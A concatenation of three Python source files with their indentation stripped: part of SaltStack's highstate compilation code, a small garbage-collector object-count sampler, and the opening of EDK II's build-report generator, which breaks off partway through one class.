if not isinstance(state[name][s_dec], list):
# Bad syntax, let the verify seq pick it up later on
continue
found = False
if s_dec.startswith("_"):
continue
for arg in state[name][s_dec]:
if isinstance(arg, dict):
if len(arg) > 0:
if next(iter(arg.keys())) == "order":
found = True
if not found:
if not isinstance(state[name][s_dec], list):
# quite certainly a syntax error, managed elsewhere
continue
state[name][s_dec].append({"order": self.iorder})
self.iorder += 1
return state
def _handle_state_decls(self, state, sls, saltenv, errors):
"""
Add sls and saltenv components to the state
"""
for name in state:
if not isinstance(state[name], dict):
if name == "__extend__":
continue
if name == "__exclude__":
continue
if isinstance(state[name], str):
# Is this is a short state, it needs to be padded
if "." in state[name]:
comps = state[name].split(".")
state[name] = {
"__sls__": sls,
"__env__": saltenv,
comps[0]: [comps[1]],
}
continue
errors.append("ID {} in SLS {} is not a dictionary".format(name, sls))
continue
skeys = set()
for key in list(state[name]):
if key.startswith("_"):
continue
if not isinstance(state[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - source: salt://redis/redis.conf
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{}' in SLS '{}' contains multiple state "
"declarations of the same type".format(name, sls)
)
continue
state[name][comps[0]] = state[name].pop(key)
state[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
if "__sls__" not in state[name]:
state[name]["__sls__"] = sls
if "__env__" not in state[name]:
state[name]["__env__"] = saltenv
def _handle_extend(self, state, sls, saltenv, errors):
"""
Take the extend dec out of state and apply to the highstate global
dec
"""
if "extend" in state:
ext = state.pop("extend")
if not isinstance(ext, dict):
errors.append(
("Extension value in SLS '{}' is not a " "dictionary").format(sls)
)
return
for name in ext:
if not isinstance(ext[name], dict):
errors.append(
"Extension name '{}' in SLS '{}' is "
"not a dictionary".format(name, sls)
)
continue
if "__sls__" not in ext[name]:
ext[name]["__sls__"] = sls
if "__env__" not in ext[name]:
ext[name]["__env__"] = saltenv
for key in list(ext[name]):
if key.startswith("_"):
continue
if not isinstance(ext[name][key], list):
continue
if "." in key:
comps = key.split(".")
ext[name][comps[0]] = ext[name].pop(key)
ext[name][comps[0]].append(comps[1])
state.setdefault("__extend__", []).append(ext)
def _handle_exclude(self, state, sls, saltenv, errors):
"""
Take the exclude dec out of the state and apply it to the highstate
global dec
"""
if "exclude" in state:
exc = state.pop("exclude")
if not isinstance(exc, list):
err = "Exclude Declaration in SLS {} is not formed " "as a list".format(
sls
)
errors.append(err)
state.setdefault("__exclude__", []).extend(exc)
def render_highstate(self, matches, context=None):
"""
Gather the state files and render them into a single unified salt
high data structure.
"""
highstate = self.building_highstate
all_errors = []
mods = set()
statefiles = []
for saltenv, states in matches.items():
for sls_match in states:
if saltenv in self.avail:
statefiles = fnmatch.filter(self.avail[saltenv], sls_match)
elif "__env__" in self.avail:
statefiles = fnmatch.filter(self.avail["__env__"], sls_match)
else:
all_errors.append(
"No matching salt environment for environment "
"'{}' found".format(saltenv)
)
# if we did not found any sls in the fileserver listing, this
# may be because the sls was generated or added later, we can
# try to directly execute it, and if it fails, anyway it will
# return the former error
if not statefiles:
statefiles = [sls_match]
for sls in statefiles:
r_env = "{}:{}".format(saltenv, sls)
if r_env in mods:
continue
state, errors = self.render_state(
sls, saltenv, mods, matches, context=context
)
if state:
self.merge_included_states(highstate, state, errors)
for i, error in enumerate(errors[:]):
if "is not available" in error:
# match SLS foobar in environment
this_sls = "SLS {} in saltenv".format(sls_match)
if this_sls in error:
errors[i] = (
"No matching sls found for '{}' "
"in env '{}'".format(sls_match, saltenv)
)
all_errors.extend(errors)
self.clean_duplicate_extends(highstate)
return highstate, all_errors
def clean_duplicate_extends(self, highstate):
if "__extend__" in highstate:
highext = []
for items in (ext.items() for ext in highstate["__extend__"]):
for item in items:
if item not in highext:
highext.append(item)
highstate["__extend__"] = [{t[0]: t[1]} for t in highext]
def merge_included_states(self, highstate, state, errors):
# The extend members can not be treated as globally unique:
if "__extend__" in state:
highstate.setdefault("__extend__", []).extend(state.pop("__extend__"))
if "__exclude__" in state:
highstate.setdefault("__exclude__", []).extend(state.pop("__exclude__"))
for id_ in state:
if id_ in highstate:
if highstate[id_] != state[id_]:
errors.append(
(
"Detected conflicting IDs, SLS"
" IDs need to be globally unique.\n The"
" conflicting ID is '{}' and is found in SLS"
" '{}:{}' and SLS '{}:{}'"
).format(
id_,
highstate[id_]["__env__"],
highstate[id_]["__sls__"],
state[id_]["__env__"],
state[id_]["__sls__"],
)
)
try:
highstate.update(state)
except ValueError:
errors.append("Error when rendering state with contents: {}".format(state))
def _check_pillar(self, force=False):
"""
Check the pillar for errors, refuse to run the state if there are
errors in the pillar and return the pillar errors
"""
if force:
return True
if "_errors" in self.state.opts["pillar"]:
return False
return True
def matches_whitelist(self, matches, whitelist):
"""
Reads over the matches and returns a matches dict with just the ones
that are in the whitelist
"""
if not whitelist:
return matches
ret_matches = {}
if not isinstance(whitelist, list):
whitelist = whitelist.split(",")
for env in matches:
for sls in matches[env]:
if sls in whitelist:
ret_matches[env] = ret_matches[env] if env in ret_matches else []
ret_matches[env].append(sls)
return ret_matches
def call_highstate(
self,
exclude=None,
cache=None,
cache_name="highstate",
force=False,
whitelist=None,
orchestration_jid=None,
):
"""
Run the sequence to execute the salt highstate for this minion
"""
# Check that top file exists
tag_name = "no_|-states_|-states_|-None"
ret = {
tag_name: {
"result": False,
"comment": "No states found for this minion",
"name": "No States",
"changes": {},
"__run_num__": 0,
}
}
cfn = os.path.join(self.opts["cachedir"], "{}.cache.p".format(cache_name))
if cache:
if os.path.isfile(cfn):
with salt.utils.files.fopen(cfn, "rb") as fp_:
high = self.serial.load(fp_)
return self.state.call_high(high, orchestration_jid)
# File exists so continue
err = []
try:
top = self.get_top()
except SaltRenderError as err:
ret[tag_name]["comment"] = "Unable to render top file: "
ret[tag_name]["comment"] += str(err.error)
return ret
except Exception: # pylint: disable=broad-except
trb = traceback.format_exc()
err.append(trb)
return err
err += self.verify_tops(top)
matches = self.top_matches(top)
if not matches:
msg = (
"No Top file or master_tops data matches found. Please see "
"master log for details."
)
ret[tag_name]["comment"] = msg
return ret
matches = self.matches_whitelist(matches, whitelist)
self.load_dynamic(matches)
if not self._check_pillar(force):
err += ["Pillar failed to render with the following messages:"]
err += self.state.opts["pillar"]["_errors"]
else:
high, errors = self.render_highstate(matches)
if exclude:
if isinstance(exclude, str):
exclude = exclude.split(",")
if "__exclude__" in high:
high["__exclude__"].extend(exclude)
else:
high["__exclude__"] = exclude
err += errors
if err:
return err
if not high:
return ret
with salt.utils.files.set_umask(0o077):
try:
if salt.utils.platform.is_windows():
# Make sure cache file isn't read-only
self.state.functions["cmd.run"](
["attrib", "-R", cfn],
python_shell=False,
output_loglevel="quiet",
)
with salt.utils.files.fopen(cfn, "w+b") as fp_:
try:
self.serial.dump(high, fp_)
except TypeError:
# Can't serialize pydsl
pass
except OSError:
log.error('Unable to write to "state.highstate" cache file %s', cfn)
return self.state.call_high(high, orchestration_jid)
def compile_highstate(self):
"""
Return just the highstate or the errors
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
err += errors
if err:
return err
return high
def compile_low_chunks(self):
"""
Compile the highstate but don't run it, return the low chunks to
see exactly what the highstate will execute
"""
top = self.get_top()
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
# If there is extension data reconcile it
high, ext_errors = self.state.reconcile_extend(high)
errors += ext_errors
# Verify that the high data is structurally sound
errors += self.state.verify_high(high)
high, req_in_errors = self.state.requisite_in(high)
errors += req_in_errors
high = self.state.apply_exclude(high)
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.state.compile_high_data(high)
return chunks
def compile_state_usage(self):
"""
Return all used and unused states for the minion based on the top match data
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
if err:
return err
matches = self.top_matches(top)
state_usage = {}
for saltenv, states in self.avail.items():
env_usage = {
"used": [],
"unused": [],
"count_all": 0,
"count_used": 0,
"count_unused": 0,
}
env_matches = matches.get(saltenv)
for state in states:
env_usage["count_all"] += 1
if state in env_matches:
env_usage["count_used"] += 1
env_usage["used"].append(state)
else:
env_usage["count_unused"] += 1
env_usage["unused"].append(state)
state_usage[saltenv] = env_usage
return state_usage
class HighState(BaseHighState):
"""
Generate and execute the salt "High State". The High State is the
compound state derived from a group of template files stored on the
salt master or in the local cache.
"""
# a stack of active HighState objects during a state.highstate run
stack = []
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.opts = opts
self.client = salt.fileclient.get_file_client(self.opts)
BaseHighState.__init__(self, opts)
self.state = State(
self.opts,
pillar_override,
jid,
pillar_enc,
proxy=proxy,
context=context,
mocked=mocked,
loader=loader,
initial_pillar=initial_pillar,
)
self.matchers = salt.loader.matchers(self.opts)
self.proxy = proxy
# tracks all pydsl state declarations globally across sls files
self._pydsl_all_decls = {}
# a stack of current rendering Sls objects, maintained and used by the pydsl renderer.
self._pydsl_render_stack = []
def push_active(self):
self.stack.append(self)
@classmethod
def clear_active(cls):
# Nuclear option
#
# Blow away the entire stack. Used primarily by the test runner but also
# useful in custom wrappers of the HighState class, to reset the stack
# to a fresh state.
cls.stack = []
@classmethod
def pop_active(cls):
cls.stack.pop()
@classmethod
def get_active(cls):
try:
return cls.stack[-1]
except IndexError:
return None
class MasterState(State):
"""
Create a State object for master side compiling
"""
def __init__(self, opts, minion):
State.__init__(self, opts)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
# Load a modified client interface that looks like the interface used
# from the minion, but uses remote execution
#
self.functions = salt.client.FunctionWrapper(self.opts, self.opts["id"])
# Load the states, but they should not be used in this class apart
# from inspection
self.utils = salt.loader.utils(self.opts)
self.serializers = salt.loader.serializers(self.opts)
self.states = salt.loader.states(
self.opts, self.functions, self.utils, self.serializers
)
self.rend = salt.loader.render(
self.opts, self.functions, states=self.states, context=self.state_con
)
class MasterHighState(HighState):
"""
Execute highstate compilation from the master
"""
def __init__(self, master_opts, minion_opts, grains, id_, saltenv=None):
# Force the fileclient to be local
opts = copy.deepcopy(minion_opts)
opts["file_client"] = "local"
opts["file_roots"] = master_opts["master_roots"]
opts["renderer"] = master_opts["renderer"]
opts["state_top"] = master_opts["state_top"]
opts["id"] = id_
opts["grains"] = grains
HighState.__init__(self, opts)
class RemoteHighState:
"""
Manage gathering the data from the master
"""
# XXX: This class doesn't seem to be used anywhere
def __init__(self, opts, grains):
self.opts = opts
self.grains = grains
self.serial = salt.payload.Serial(self.opts)
# self.auth = salt.crypt.SAuth(opts)
self.channel = salt.transport.client.ReqChannel.factory(self.opts["master_uri"])
self._closing = False
def compile_master(self):
"""
Return the state data from the master
"""
load = {"grains": self.grains, "opts": self.opts, "cmd": "_master_state"}
try:
return self.channel.send(load, tries=3, timeout=72000)
except SaltReqTimeoutError:
return {}
def destroy(self):
if self._closing:
return
self._closing = True
self.channel.close()
# pylint: disable=W1701
def __del__(self):
self.destroy()
# pylint: enable=W1701
|
__init__.py
|
import gc
import threading
import time
from collections import deque
import itertools
# maximum from all old periods is being promoted to next one
DOWSER_MAXENTRIES = [12, 120, 60, 60]
DOWSER_TICKS = [5, 6, 48, 28]
DOWSER_NAMES = ["1m", "1h", "1d", "4w"]
class Dowser(object):
"""
A working thread to gather type usage
"""
history = {}
samples = []
def __init__(self):
# TODO: how to limit it only to server process not the monitor
# TODO: cover multi-process configuration - maybe as separate daemon...
self.running = False
self.samples = [0] * len(DOWSER_MAXENTRIES)
self.runthread = threading.Thread(target=self.start)
self.runthread.daemon = True
self.runthread.start()
def start(self):
self.running = True
while self.running:
self.tick()
time.sleep(DOWSER_TICKS[0])
def tick(self):
gc.collect()
typecounts = {}
for obj in gc.get_objects():
objtype = type(obj)
typename = str(objtype.__module__) + "." + objtype.__name__
if typename in typecounts:
typecounts[typename] += 1
else:
typecounts[typename] = 1
for typename, count in typecounts.items():
if typename not in self.history:
self.history[typename] = [deque([0] * x) for x in DOWSER_MAXENTRIES]
self.history[typename][0].appendleft(count)
self.samples[0] += 1
promote = [False] * (len(DOWSER_MAXENTRIES)-1)
# let's calculate what we promote
for i in range(len(self.samples)-1):
if self.samples[i] >= DOWSER_TICKS[i]:
promote[i] = True
self.samples[i+1] += 1
self.samples[i] = 0
for typename, hist in self.history.items():
history = self.history[typename]
# let's promote max from (set of entries to lower granularity history)
for i in range(len(self.samples)-1):
if promote[i]:
history[i+1].appendleft(max(itertools.islice(history[i], 0, DOWSER_TICKS[i])))
# let's limit history to DOWSER_MAXENTRIES
for i in range(len(self.samples)):
if len(history[i]) > DOWSER_MAXENTRIES[i]:
history[i].pop()
def stop(self):
self.running = False
dowser = Dowser()
|
BuildReport.py
|
## @file
# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
## Import Modules
#
import Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from io import BytesIO
from Common import EdkLogger
from Common.Misc import SaveFileOnChange
from Common.Misc import GuidStructureByteArrayToGuidString
from Common.Misc import GuidStructureStringToGuidString
from Common.BuildToolError import FILE_WRITE_FAILURE
from Common.BuildToolError import CODE_ERROR
from Common.BuildToolError import COMMAND_FAILURE
from Common.BuildToolError import FORMAT_INVALID
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import Common.GlobalData as GlobalData
from AutoGen.AutoGen import ModuleAutoGen
from Common.Misc import PathClass
from Common.StringUtils import NormPath
from Common.DataType import *
import collections
from Common.Expression import *
from GenFds.AprioriSection import DXE_APRIORI_GUID, PEI_APRIORI_GUID
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Pattern to find total FV total size, occupied size in flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\r\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
TAB_PCDS_FIXED_AT_BUILD : ('FIXED', TAB_PCDS_FIXED_AT_BUILD),
TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH', TAB_PCDS_PATCHABLE_IN_MODULE),
TAB_PCDS_FEATURE_FLAG : ('FLAG', TAB_PCDS_FEATURE_FLAG),
TAB_PCDS_DYNAMIC : ('DYN', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_HII : ('DYNHII', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_VPD : ('DYNVPD', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_EX : ('DEX', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_HII : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_VPD : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
}
## The look up table to map module type to driver type
gDriverTypeMap = {
SUP_MODULE_SEC : '0x3 (SECURITY_CORE)',
SUP_MODULE_PEI_CORE : '0x4 (PEI_CORE)',
SUP_MODULE_PEIM : '0x6 (PEIM)',
SUP_MODULE_DXE_CORE : '0x5 (DXE_CORE)',
SUP_MODULE_DXE_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SAL_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SMM_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
SUP_MODULE_UEFI_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_UEFI_APPLICATION : '0x9 (APPLICATION)',
SUP_MODULE_SMM_CORE : '0xD (SMM_CORE)',
'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
SUP_MODULE_MM_STANDALONE : '0xE (MM_STANDALONE)',
SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
}
## The look up table of the supported opcode in the dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
## Save VPD Pcd
VPDPcdList = []
##
# Writes a string to the file object.
#
# This function writes a string to the file object and a new line is appended
# afterwards. It may optionally wraps the string for better readability.
#
# @File The file object to write
# @String The string to be written to the file
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
if Wrapper:
String = textwrap.fill(String, 120)
File.append(String + gEndOfLine)
def ByteArrayForamt(Value):
IsByteArray = False
SplitNum = 16
ArrayList = []
if Value.startswith('{') and Value.endswith('}') and not Value.startswith("{CODE("):
Value = Value[1:-1]
ValueList = Value.split(',')
if len(ValueList) >= SplitNum:
IsByteArray = True
if IsByteArray:
if ValueList:
Len = len(ValueList)/SplitNum
for i, element in enumerate(ValueList):
ValueList[i] = '0x%02X' % int(element.strip(), 16)
if Len:
Id = 0
while (Id <= Len):
End = min(SplitNum*(Id+1), len(ValueList))
Str = ','.join(ValueList[SplitNum*Id : End])
if End == len(ValueList):
Str += '}'
ArrayList.append(Str)
break
else:
Str += ','
ArrayList.append(Str)
Id += 1
else:
ArrayList = [Value + '}']
return IsByteArray, ArrayList
##
# Find all the header file that the module source directly includes.
#
# This function scans source code to find all header files the module may
# include. This is not accurate but very effective to find all the header
# file the module might include with #include statement.
#
# @Source The source file name
# @IncludePathList The list of include path to find the source file.
# @IncludeFiles The dictionary of current found include files.
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
FileContents = open(Source).read()
#
# Find header files with pattern #include "XXX.h" or #include <XXX.h>
#
for Match in gIncludePattern.finditer(FileContents):
FileName = Match.group(1).strip()
for Dir in [os.path.dirname(Source)] + IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
#
# Find header files with pattern like #include EFI_PPI_CONSUMER(XXX)
#
for Match in gIncludePattern2.finditer(FileContents):
Key = Match.group(2)
Type = Match.group(1)
if "ARCH_PROTOCOL" in Type:
FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PROTOCOL" in Type:
FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PPI" in Type:
FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif TAB_GUID in Type:
FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key}
else:
continue
for Dir in IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
## Split each lines in file
#
# This method is used to split the lines in file to make the length of each line
# less than MaxLength.
#
# @param Content The content of file
# @param MaxLength The Max Length of the line
#
def FileLinesSplit(Content=None, MaxLength=None):
ContentList = Content.split(TAB_LINE_BREAK)
NewContent = ''
NewContentList = []
for Line in ContentList:
while len(Line.rstrip()) > MaxLength:
LineSpaceIndex = Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength)
LineSlashIndex = Line.rfind(TAB_SLASH, 0, MaxLength)
LineBackSlashIndex = Line.rfind(TAB_BACK_SLASH, 0, MaxLength)
if max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) > 0:
LineBreakIndex = max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex)
else:
LineBreakIndex = MaxLength
NewContentList.append(Line[:LineBreakIndex])
Line = Line[LineBreakIndex:]
if Line:
NewContentList.append(Line)
for NewLine in NewContentList:
NewContent += NewLine + TAB_LINE_BREAK
NewContent = NewContent.replace(gEndOfLine, TAB_LINE_BREAK).replace('\r\r\n', gEndOfLine)
return NewContent
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translate the readable
# GUID name and value.
#
class DepexParser(object):
##
# Constructor function for class DepexParser
#
# This constructor function collect GUID values so that the readable
# GUID name can be translated.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._GuidDb = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for Protocol in Package.Protocols:
GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol])
self._GuidDb[GuidValue.upper()] = Protocol
for Ppi in Package.Ppis:
GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi])
self._GuidDb[GuidValue.upper()] = Ppi
for Guid in Package.Guids:
GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid])
self._GuidDb[GuidValue.upper()] = Guid
for Ma in Pa.ModuleAutoGenList:
for Pcd in Ma.FixedVoidTypePcds:
PcdValue = Ma.FixedVoidTypePcds[Pcd]
if len(PcdValue.split(',')) == 16:
GuidValue = GuidStructureByteArrayToGuidString(PcdValue)
self._GuidDb[GuidValue.upper()] = Pcd
##
# Parse the binary dependency expression files.
#
# This function parses the binary dependency expression file and translate it
# to the instruction list.
#
# @param self The object pointer
# @param DepexFileName The file name of binary dependency expression file.
#
def ParseDepexFile(self, DepexFileName):
DepexFile = open(DepexFileName, "rb")
DepexStatement = []
OpCode = DepexFile.read(1)
while OpCode:
Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
if Statement in ["BEFORE", "AFTER", "PUSH"]:
GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
GuidString = self._GuidDb.get(GuidValue, GuidValue)
Statement = "%s %s" % (Statement, GuidString)
DepexStatement.append(Statement)
OpCode = DepexFile.read(1)
return DepexStatement
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
##
# Constructor function for class LibraryReport
#
# This constructor function generates LibraryReport object for
# a module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.LibraryList = []
for Lib in M.DependentLibraryList:
LibInfPath = str(Lib)
LibClassList = Lib.LibraryClass[0].LibraryClass
LibConstructorList = Lib.ConstructorList
LibDesstructorList = Lib.DestructorList
LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
for LibAutoGen in M.LibraryAutoGenList:
if LibInfPath == LibAutoGen.MetaFile.Path:
LibTime = LibAutoGen.BuildTime
break
self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDesstructorList, LibDepexList, LibTime))
##
# Generate report for module library information
#
# This function generates report for the module library.
# If the module is EDKII style one, the additional library class, library
# constructor/destructor and dependency expression may also be reported.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if len(self.LibraryList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_LIBRARY)
FileWrite(File, gSubSectionSep)
for LibraryItem in self.LibraryList:
LibInfPath = LibraryItem[0]
FileWrite(File, LibInfPath)
LibClass = LibraryItem[1]
EdkIILibInfo = ""
LibConstructor = " ".join(LibraryItem[2])
if LibConstructor:
EdkIILibInfo += " C = " + LibConstructor
LibDestructor = " ".join(LibraryItem[3])
if LibDestructor:
EdkIILibInfo += " D = " + LibDestructor
LibDepex = " ".join(LibraryItem[4])
if LibDepex:
EdkIILibInfo += " Depex = " + LibDepex
if LibraryItem[5]:
EdkIILibInfo += " Time = " + LibraryItem[5]
if EdkIILibInfo:
FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
else:
FileWrite(File, "{%s}" % LibClass)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
##
# Constructor function for class DepexReport
#
# This constructor function generates DepexReport object for
# a module. If the module source contains the DXS file (usually EDK
# style module), it uses the dependency in DXS file; otherwise,
# it uses the dependency expression from its own INF [Depex] section
# and then merges with the ones from its dependent library INF.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.Depex = ""
self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
return
for Source in M.SourceFileList:
if os.path.splitext(Source.Path)[1].lower() == ".dxs":
Match = gDxsDependencyPattern.search(open(Source.Path).read())
if Match:
self.Depex = Match.group(1).strip()
self.Source = "DXS"
break
else:
self.Depex = M.DepexExpressionDict.get(M.ModuleType, "")
self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
if not self.ModuleDepex:
self.ModuleDepex = "(None)"
LibDepexList = []
for Lib in M.DependentLibraryList:
LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
if LibDepex != "":
LibDepexList.append("(" + LibDepex + ")")
self.LibraryDepex = " AND ".join(LibDepexList)
if not self.LibraryDepex:
self.LibraryDepex = "(None)"
self.Source = "INF"
##
# Generate report for module dependency expression information
#
# This function generates report for the module dependency expression.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalDepexParser The platform global Dependency expression parser object
#
def GenerateReport(self, File, GlobalDepexParser):
if not self.Depex:
return
FileWrite(File, gSubSectionStart)
if os.path.isfile(self._DepexFileName):
try:
DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
for DepexStatement in DepexStatements:
FileWrite(File, " %s" % DepexStatement)
FileWrite(File, gSubSectionSep)
except:
EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
if self.Source == "INF":
FileWrite(File, self.Depex, True)
FileWrite(File, gSubSectionSep)
FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True)
FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
else:
FileWrite(File, self.Depex)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module build flags subsection in the build report file.
#
class BuildFlagsReport(object):
##
# Constructor function for class BuildFlagsReport
#
# This constructor function generates BuildFlagsReport object for
# a module. It reports the build tool chain tag and all relevant
# build flags to build the module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
BuildOptions = {}
#
# Add build flags according to source file extension so that
# irrelevant ones can be filtered out.
#
for Source in M.SourceFileList:
Ext = os.path.splitext(Source.File)[1].lower()
if Ext in [".c", ".cc", ".cpp"]:
BuildOptions["CC"] = 1
elif Ext in [".s", ".asm"]:
BuildOptions["PP"] = 1
BuildOptions["ASM"] = 1
elif Ext in [".vfr"]:
BuildOptions["VFRPP"] = 1
BuildOptions["VFR"] = 1
elif Ext in [".dxs"]:
BuildOptions["APP"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asl"]:
BuildOptions["ASLPP"] = 1
BuildOptions["ASL"] = 1
elif Ext in [".aslc"]:
BuildOptions["ASLCC"] = 1
BuildOptions["ASLDLINK"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asm16"]:
BuildOptions["ASMLINK"] = 1
BuildOptions["SLINK"] = 1
BuildOptions["DLINK"] = 1
#
